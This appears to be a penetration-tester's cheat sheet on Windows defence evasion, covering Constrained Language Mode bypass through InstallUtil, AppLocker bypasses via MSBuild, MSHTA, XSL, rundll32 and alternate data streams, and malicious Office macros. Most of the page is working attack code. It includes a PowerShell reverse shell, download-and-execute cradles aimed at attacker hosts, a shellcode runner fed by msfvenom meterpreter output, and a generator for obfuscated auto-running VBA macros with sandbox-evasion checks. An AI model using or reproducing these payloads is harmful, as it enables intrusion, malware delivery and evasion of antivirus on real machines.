Bypass-Evasion Techniques

CLM Bypass

Detecting,

PS C:\Users\morph3\Desktop> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

Idea is very simple, we can abuse InstallUtil.exe like below and bypass CLM

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Hello from main");
        }
    }
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            string rev = @"$client = New-Object System.Net.Sockets.TCPClient('192.168.255.255',4444);
                                    $stream = $client.GetStream();
                                    [byte[]]$bytes = 0..65535|%{0};
                                    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
                                    {
	                                    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
	                                    try
	                                    {	
		                                    $sendback = (iex $data 2>&1 | Out-String );
		                                    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
	                                    }
	                                    catch
	                                    {
		                                    $error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
		                                    $sendback2  =  ""ERROR: "" + $error[0].ToString() + ""`n`n"" + ""PS "" + (pwd).Path + '> ';
	                                    }	
	                                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	                                    $stream.Write($sendbyte,0,$sendbyte.Length);
	                                    $stream.Flush();
                                    };
                                    $client.Close();";
        
            String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.255.255/run.ps1') | powershell -noprofile";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();



        }

    }
}

Build this csharp file above and execute it like below,

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U .\my_clm_bypass.exe

Other alternatives,

CLM-Rout,

https://github.com/aress31/clm-rout/tree/main/CLMRout

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /uninstall /logfile= /LogToConsole=false /script="http://192.168.255.255/a.ps1" .\CLMRout.exe

PowerShDll,

https://github.com/p3nt4/PowerShdll

Downgrade (this probably never works I guess),

powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')

PSByPassCLM,

https://github.com/padovah4ck/PSByPassCLM

^ disable amsi bypass

#interactice
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=false /logfile= /LogToConsole=true /U .\psbypassclm.exe

#revshell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=true /rhost=192.168.49.130 /rport=443 /logfile= /LogToConsole=true /U c:\windows\temp\PsBypassCLM.exe

Downgrading (this probably never works I guess),

powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')

Applocker Bypass

https://github.com/api0cradle/UltimateAppLockerByPassList

MSBuild

Generate a shellcode like below,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.255 LPORT=9001  -f csharp -e x86/shikata_ga_nai -i  10 > out.cs

Replace the shellcode in the template and save it like something.csproj

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
            byte[] shellcode = new byte[195] {
              0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
              0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
              0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
              0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
              0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
              0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
              0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
              0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
              0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
              0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
              0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
              0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
              0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Execute the payload

C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\something.csproj

MSHTA

<html> 
<head> 
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe /c calc.exe");
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>

mshta http://192.168.255.255/test.hta

XSL

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell");
 r.Run("cmd.exe");
 ]]>
 </ms:script>
</stylesheet>

wmic process get brief /format:"http://192.168.255.255/a.xsl

DLL

test.cpp

#include <windows.h>
#include <stdlib.h>

extern "C" __declspec(dllexport) void pwn(void)
{
    OutputDebugString("ExportedFunction");
    system("whoami > a.txt");
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        OutputDebugString("DLL_PROCESS_ATTACH");
        break;
 
    case DLL_THREAD_ATTACH:
        OutputDebugString("DLL_THREAD_ATTACH");
        break;
 
    case DLL_THREAD_DETACH:
        OutputDebugString("DLL_THREAD_DETACH");
        break;
 
    case DLL_PROCESS_DETACH:
        OutputDebugString("DLL_PROCESS_DETACH");
        break;
    }
 
    return TRUE;
}

x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

C:\Windows\System32\rundll32.exe test.dll,pwn
C:\Windows\SysWOW64\rundll32.exe test.dll,pwn
rundll32 test.dll,pwn

ADS - Alternate Data Stream

foo.js

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

C:\Users\morph3\desktop>type foo.js > test.exe 
C:\Users\morph3\desktop>wscript test.exe:foo.js

Maldoc

Rot13 Encoding

It randomly select rot iteration

import random

ceaser_iter = random.randint(2,25)

payload = "curl 192.168.49.248/aa"
payload = "powershell -ep bypass -c \"curl 192.168.49.248/a|iex\""
print(f"[*] payload: {payload}")
print(f"[*] ceaser_iter: {ceaser_iter}")
def encrypt_ceaser(s):
    """
    $payload = "winmgmts:"
    [string]$output = ""
    $payload.ToCharArray() | %{
     [string]$thischar = [byte][char]$_ + 12
     if($thischar.Length -eq 1)
     {
     $thischar = [string]"00" + $thischar
     $output += $thischar
     }  
     elseif($thischar.Length -eq 2)
     {
     $thischar = [string]"0" + $thischar
     $output += $thischar
     }
     elseif($thischar.Length -eq 3)
     {
     $output += $thischar
     }
    }
    $output
    """
    enc_s = ""
    for c in s:
        itered_char = ord(c) + ceaser_iter
        enc_s += str(itered_char).rjust(3,"0")
    return enc_s


strings = ["Doc1.docm", payload, "winmgmts:", "Win32_Process"]
enc_strings = []

for s in strings:
    enc_strings.append(encrypt_ceaser(s))    


for i,j in zip(strings, enc_strings):
    pass
    #print(f"{i}:{j}")


tpl = f"""
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Sub Document_Open()
 MyMacro
End Sub
Sub AutoOpen()
 MyMacro
End Sub
Function Venus(Goats)
 Venus = Chr(Goats - {ceaser_iter})
End Function
Function Mercury(Grapes)
 Mercury = Left(Grapes, 3)
End Function
Function Gorgon(Topside)
 Gorgon = Right(Topside, Len(Topside) - 3)
End Function
Function Mars(Jupiter)
 Do
 Shazam = Shazam + Venus(Mercury(Jupiter))
 Jupiter = Gorgon(Jupiter)
 Loop While Len(Jupiter) > 0
 Mars = Shazam
End Function
Function MyMacro()
 Dim Earth As String
 Dim Neptune As String
 Dim t1 As Date
 Dim t2 As Date
 Dim time As Long
 t1 = Now()
 Sleep (5000)
 t2 = Now()
 time = DateDiff("s", t1, t2)
 If time < 4.5 Then
    Exit Function
 End If
 If ActiveDocument.Name <> Mars("{enc_strings[0]}") Then
    Exit Function
 End If
 Earth = "{enc_strings[1]}"
 Neptune = Mars(Earth)
 GetObject(Mars("{enc_strings[2]}")).Get(Mars("{enc_strings[3]}")).Create Neptune, Tea, Coffee, Napkin
End Function
"""

print(tpl)

URI to RCE (Follina)

Offensive VBA

https://github.com/S3cur3Th1sSh1t/OffensiveVBA

Bypasses defender,

https://raw.githubusercontent.com/S3cur3Th1sSh1t/OffensiveVBA/main/src/Reverse-Shell.vba

ShellExecuteA

Option Explicit

Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" ( _
         ByVal hwnd As Long, _
         ByVal lpOperation As String, _
         ByVal lpFile As String, _
         ByVal lpParameters As String, _
         ByVal lpDirectory As String, _
         ByVal lpShowCmd As Long) As Long

Sub AutoOpen()
Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1)
End Sub
Sub Document_Open()
Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1)
End Sub

Last updated 3 years ago